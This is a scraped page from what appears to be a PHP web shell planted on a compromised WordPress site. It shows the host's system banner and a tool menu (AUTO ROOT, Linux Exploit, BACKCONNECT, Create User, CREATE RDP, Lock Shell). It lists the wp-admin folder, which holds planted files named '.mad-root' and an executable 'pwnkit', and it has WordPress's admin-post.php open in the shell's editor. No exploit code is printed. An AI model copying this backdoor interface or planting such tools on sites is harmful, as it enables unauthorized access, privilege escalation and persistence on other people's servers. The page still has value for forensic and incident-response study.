Linux webm007.cluster131.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.131.20.7 | : 216.73.216.243
Cant Read [ /etc/named.conf ]
7.4.33
covoprp
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
covoprp /
www /
wp-admin /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin-ajax.php
5.03
KB
-rw-r--r--
admin-footer.php
2.77
KB
-rw-r--r--
admin-functions.php
479
B
-rw-r--r--
admin-post.php
1.97
KB
-rw-r--r--
admin.php
12.35
KB
-rw-r--r--
authorize-application.php
10.09
KB
-rw-r--r--
comment.php
11.35
KB
-rw-r--r--
edit-comments.php
14.38
KB
-rw-r--r--
edit-form-comment.php
8.34
KB
-rw-r--r--
edit-tag-form.php
10.44
KB
-rw-r--r--
edit-tags.php
22
KB
-rw-r--r--
erase-personal-data.php
7.33
KB
-rw-r--r--
export-personal-data.php
7.75
KB
-rw-r--r--
link-manager.php
4.26
KB
-rw-r--r--
ms-admin.php
196
B
-rw-r--r--
ms-delete-site.php
4.5
KB
-rw-r--r--
options-discussion.php
15.92
KB
-rw-r--r--
post-new.php
2.7
KB
-rw-r--r--
post.php
10.03
KB
-rw-r--r--
privacy-policy-guide.php
3.67
KB
-rw-r--r--
profile.php
283
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
site-health-info.php
3.99
KB
-rw-r--r--
update-core.php
45.45
KB
-rw-r--r--
update.php
12.79
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin-post.php
<?php /** * WordPress Generic Request (POST/GET) Handler * * Intended for form submission handling in themes and plugins. * * @package WordPress * @subpackage Administration */ /** We are located in WordPress Administration Screens */ if ( ! defined( 'WP_ADMIN' ) ) { define( 'WP_ADMIN', true ); } /** Load WordPress Bootstrap */ require_once dirname( __DIR__ ) . '/wp-load.php'; /** Allow for cross-domain requests (from the front end). */ send_origin_headers(); require_once ABSPATH . 'wp-admin/includes/admin.php'; nocache_headers(); /** This action is documented in wp-admin/admin.php */ do_action( 'admin_init' ); $action = ! empty( $_REQUEST['action'] ) ? sanitize_text_field( $_REQUEST['action'] ) : ''; // Reject invalid parameters. if ( ! is_scalar( $action ) ) { wp_die( '', 400 ); } if ( ! is_user_logged_in() ) { if ( empty( $action ) ) { /** * Fires on a non-authenticated admin post request where no action is supplied. * * @since 2.6.0 */ do_action( 'admin_post_nopriv' ); } else { // If no action is registered, return a Bad Request response. if ( ! has_action( "admin_post_nopriv_{$action}" ) ) { wp_die( '', 400 ); } /** * Fires on a non-authenticated admin post request for the given action. * * The dynamic portion of the hook name, `$action`, refers to the given * request action. * * @since 2.6.0 */ do_action( "admin_post_nopriv_{$action}" ); } } else { if ( empty( $action ) ) { /** * Fires on an authenticated admin post request where no action is supplied. * * @since 2.6.0 */ do_action( 'admin_post' ); } else { // If no action is registered, return a Bad Request response. if ( ! has_action( "admin_post_{$action}" ) ) { wp_die( '', 400 ); } /** * Fires on an authenticated admin post request for the given action. * * The dynamic portion of the hook name, `$action`, refers to the given * request action. * * @since 2.6.0 */ do_action( "admin_post_{$action}" ); } }
Close